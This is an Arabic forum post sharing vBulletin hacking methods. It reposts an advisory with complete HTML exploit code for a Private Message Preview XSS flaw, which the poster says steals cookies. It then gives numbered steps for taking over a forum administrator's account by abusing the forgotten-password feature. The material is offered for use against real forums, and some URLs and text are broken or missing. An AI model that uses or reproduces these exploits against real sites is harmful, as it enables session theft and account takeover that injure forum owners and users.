أرجوا عدم استخدام الثغرة على المسلمين وفيما يظر بالإسلام وفيما حرمه الله
لكن هذي كانت على النسخة التجريبية Beta
بالنسبة للثغرة فهي واضحة
وهي تستغل عن طريق الرسائل private.php وتقوم بسرقة الكوكيز ولكن بشرط يكون مفعل كود الهتمل في المنتدى وصاحب الثغرة يذكر انه قد يكون من الضروري تسجيل الدخول لك
طبعا استغلالها عن طريق تحويل الكود لملف html مع تغيير اسم الموقع ومجلد المنتدى
PHP: ------------------------------------------------------------------------------From: Ferruh Mavituna Subject: VBulletin Preview Message&nbs p;- XSS Vuln --------------------------------------- VBulletin Private Message&nbs p;"Preview Message" XSS Vulnerability --------------------------------------- Any kind of XSS att acks possibility. ----------------------------------------------------- About VBulletin; ----------------------------------------------------- PHP Based Popular Forum& nbsp;Application Vendor & Demo; <a href="http://www.vbulletin.com/" target="_blank"><a href="http://www.vbulletin.com/" target="_blank">http://www.vbulletin.com/</a></a> --------------------------------------- Vulnerable; ----------------------------------------------------- vBulletin 3.0.0 Beta 2 <br />vBulletin 2.x --------------------------------------- Vendor Status; ----------------------------------------------------- I can not contact v endor for this issue ! No patch available at&nb sp;the moment; ----------------------------------------------------- Solution; ----------------------------------------------------- HTML Encoding like post& nbsp;thread preview page; ----------------------------------------------------- Exploit Code; ----------------------------------------------------- <html> <body> <form action="http://[victim]/forum/private.php"&nbs p;method="post" name="vbform"> <input type="hidden" name="do" value="insertpm" /> <input type="hidden" name="pmid" value="" /> <input type="hidden" name="forward" value="" /> <input type="hidden" name="receipt" value="0" /> <input type="text" class="bginput" name="title" value="" size="40" tabindex="2" /> <textarea name="message" rows="20" cols="70" wrap="virtual" tabindex="3"></textarea> <input type="submit" class="button" name="sbutton" value="Post Message" accesskey="s" tabindex="4" /> <input type="submit" class="button" value="Preview Message" accesskey="p" name="preview" onclick="this.form.dopreview = true; return true;this.form.submit()" tabindex="5" > <input type="checkbox" name="savecopy" value="1" id="cb_savecopy" checked="checked" /> <input type="checkbox" name="signature" value="1" id="cb_signature" /> <input type="checkbox" name="parseurl" value="1" id="cb_parseurl" checked="checked" /> <input type="checkbox" name="disablesmilies" value="1" id="cb_disablesmilies" /> </form> <script> //Set Values and Submit // You can write your own JS codes var xss = "\"><script>alert(document.coo kie)</script>"; document.vbform.title.value=xss; document.vbform.preview.click(); </script> </body> </html> *You may need login first Ferruh Mavituna Web Application Security Consultant Freelance Developer & Designer <a href="http://ferruh.mavituna.com" target="_blank"><a href="http://ferruh.mavituna.com" target="_blank">http://ferruh.mavituna.com/</a></a> طريقة أخرى
1. قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي
2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك
3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو
members .
أو العنوان التفصيلي التالي :
URL =
العنوان المستضيف للمنتدى
مثل4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين
address bar .
سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :
هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266
5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا
العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى
administrator .
(((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))
أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية
6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :
العنوان هذا ستقوم بتغيير الكلمات التالية
URL =
كما ذكرنا سابقا الموقع المستضيف للمنتدى
VALIDUSER =
أسم المستخدم الخاص بك
VALIDPASS =
كلمة السر الخاصة بك
البريد الذي سجلت به بالمنتدى
ADMIN =
أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )
7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات refresh .
8. ثم ترجع لصفحة المنتدى الرئيسية
ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .
بالطيع ستظهر لك الصفحة التعيسة التي تقول :
أنت قمت بكتابة كلمة سر خاطئة
you typed in the wrong password
9. بكل بساطة أضغط على
نسيت كلمة السر
forgot password
والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني
10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى
ملاحظة هذه الطريقة قديمة وأغلب المنتديات قاموا بإغلاق هذه الثغرة يعني لا تستطيع فعلها إلا مع منتديات اليوم